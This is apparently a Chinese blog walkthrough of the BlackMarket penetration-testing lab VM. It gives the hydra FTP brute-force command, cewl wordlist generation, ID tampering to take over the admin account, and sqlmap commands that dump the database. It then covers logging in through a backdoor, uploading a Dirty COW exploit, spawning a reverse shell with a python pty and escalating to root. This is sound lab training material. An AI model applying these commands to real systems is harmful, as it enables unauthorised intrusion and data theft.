theKingOfNight's Blog

HackTheBox-----BlackMarket

Word count: 1.5kReading time: 6 min
2019/01/19 Share

算是一次小打小闹的渗透测试了,学到的东西果然不少!
(冒着挂科的危险,仍然要做渗透,这就是所谓的爱吧!)
BlackMarket官方定义渗透难度为中低等,我直接把靶机给大家共享下:

1
2
链接:https://pan.baidu.com/s/1RNmd2eVXc6oiChK0nunbMA
密码:qqx2

下面来说一下我的实验环境

1
2
3
win10 x64
VM
靶机ip: 192.168.58.1

主机与虚拟机之间可以Ping通,开始实验

1
2
首先在地址栏中输入靶机ip,发现访问被拒绝
就需要考虑同段(C段)ip有哪些可以扫描到

这里为以zenmap为例(菜,还有喜欢图形界面)扫描.png

1
可以发现有两台另外的机器,进行连接192.168.58.254,无法连接

连接另外一台机器,界面如下login.png
然后在探测192.168.58.139开放了哪些端口
端口.png
常识ftp登陆,当然是要输入账号密码的,试了几个简单的都不行,就需要规规矩矩的找密码了。

查看网页源代码,最下面有这个

1
flag1{Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=}

base64解密

1
flag1{CIA - Operation Treadstone}

然后直接google这个

1
2
可以看到第一条就是这个网站
http://bourne.wikia.com/wiki/Operation_Treadstone

然后使用cewl来爬取网站并生成字典

1
2
命令如下
cewl -d -m -w /root/Desktop/list.txt http://bourne.wikia.com/wiki/Operation_Treadstone

然后暴力破解ftp

1
2
3
4
5
6
7
可以使用python脚本写一个(https://www.jianshu.com/p/e01bcbb67c1a改进)
也可以使用hydra爆破ftp
hydra -L /root/Desktop/name.txt -P /root/Desktop/list.txt ftp://192.168.58.139
tips:这个爆破应该是需要好久时间的,不过这个只是时间问题
这里只提供一个思路,一般的话还是得爆好久
可以爆破出来,或者在最后一步提权成功之后直接查看也是可以的

这里直接采用正确的账号密码了

1
ftp登陆:nicky CIA

ftp.png
然后可以看到里面有个txt文件,文件内容为

1
2
3
flag2{Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy}
If anyone reading this message it means you are on the right track however I do not have any idea about the CIA blackmarket Vehical workshop. You must find out and hack it!

尝试扫描一波后台路径

1
2
tips:向这种交易网站后台路径就直接google交易网站后台路径字典
dirbuster也是比较好用的

dir.png
然后就可以扫到supplier目录

1
然后就用supplier supplier登陆进去(比较容易想到)

然后直接转到路径admin,发现可以进去

1
http://192.168.58.139/admin/

然后修改Customer的信息

1
2
tips:发现supplier的权限不是一般的大啊
可以修改好多

通过burp不断抓包可以看到针对不同的用户,对应的id是不同的id.png
而且id随着用户的增加越来越大,这就比较容易想到admin的id为1
直接改包:change.png
然后用admin/admin就可以登录进去
admin.png
题目的意思就是让我们找到Jason Bourne Email ,这种东西一般在哪里呢?
很容易想到应该是在数据库里,而且一般很有可能出现的地方与数据库打交道的地方
也就是我们可以修改的地方:mode.png
sqlmap一把梭

1
2
3
4
5
6
sqlmap -r /root/Desktop/request.txt --level 5 --dbs
BlackMarket
sqlmap -r /root/Desktop/request.txt --level 5 -D BlackMarket --tables
Flag
sqlmap -r /root/Desktop/request.txt --level 5 -D BlackMarket -T Flag --dump
jbourne

request.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /admin/edit_customer.php?id=11 HTTP/1.1
Host: 192.168.58.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://192.168.58.139/admin/customer.php
Cookie: PHPSESSID=2b4vq62tsvb2l2u05404honjv2
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 93
name=111111&address=1111&contact=1111&username=1111&password=b0baee9d279d34fa1dfd71aadb908c3f

上一个flag已经告诉我们密码为?????,根据扫到的目录
尝试http://192.168.58.139/squirrelmail/
squirrelmail.png
然后jbourne ?????登陆进去
/squirrelmail/src/webmail.png
然后随便找找就能找到一样的东西

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Flag5{RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ=}
HELLO Friend,
I have intercept the message from Russian's some how we are working on the same
direction, however, I couldn't able to decode the message.
<Message Begins>
Sr Wrnrgir
Ru blf ziv ivzwrmt gsrh R nrtsg yv mlg zorev. R szev kozxv z yzxpwlli rm Yozxpnzipvg
dliphslk fmwvi /ptyyzxpwlli ulowvi blf nfhg szev gl
KzhhKzhh.qkt rm liwvi gl szxp rm rg.
</end>

解密

1
Flag5{Everything is encrypted}

然后各种尝试,可以发现这个是古典置换密码,解密得到
https://www.quipqiup.com/

1
Hi Dimitri If you are reading this I might be not alive. I have place a backdoor in Blackmarket workshop under /kgbbackdoor folder you must have to PassPass.jpg in order to hack in it.

这里打破脑子也没有想到,这里需要flag2中的提示(也可以自己根据workshop fuzz一波)

1
2
3
flag2{Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy}
If anyone reading this message it means you are on the right track however I do not have any idea about the CIA blackmarket Vehical workshop. You must find out and hack it!

然后这里的路径是vworkshop
http://192.168.58.139/vworkshop/kgbbackdoor/PassPass.png
然后把这个图片保存在本地,用notpad++打开,最后一行有一个密码,asciihex解密得到:HailKGB
那么后门的密码已经得到了,还需要一个后门地址,根据图片的提示(上一个flag也提示在这个目录下)就在这里附近,直接访问backdoor.php(也可以扫描,这里直接就提示backdoor了)

####然后又到了打破脑子也想不到的地方了,不过心细的人可以发现这里有的问题
image.png
直接传入密码进入后台,就可以看到文件
backdoor.png

1
flag6{Um9vdCB0aW1l} (也可以在这里找到flag2)

然后找个目录上传自己的马,我这里上传的是脏牛,我这里上传的目录是:

1
2
3
4
5
6
/var/www/html/
```
然后进行反弹shell:
![connect.png](https://upload-images.jianshu.io/upload_images/9172841-626f6be7c5d75bc8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
然后输入

python -c ‘import pty;pty.spawn(“/bin/bash”)’
```
hack-in.png
电脑已经和那个服务器建立连接了
然后就是提取了,切换到那个目录下,然后运行牛
最后截图纪念一下 :finish.png

参考

https://www.anquanke.com/post/id/106855

CATALOG
  1. 1. 参考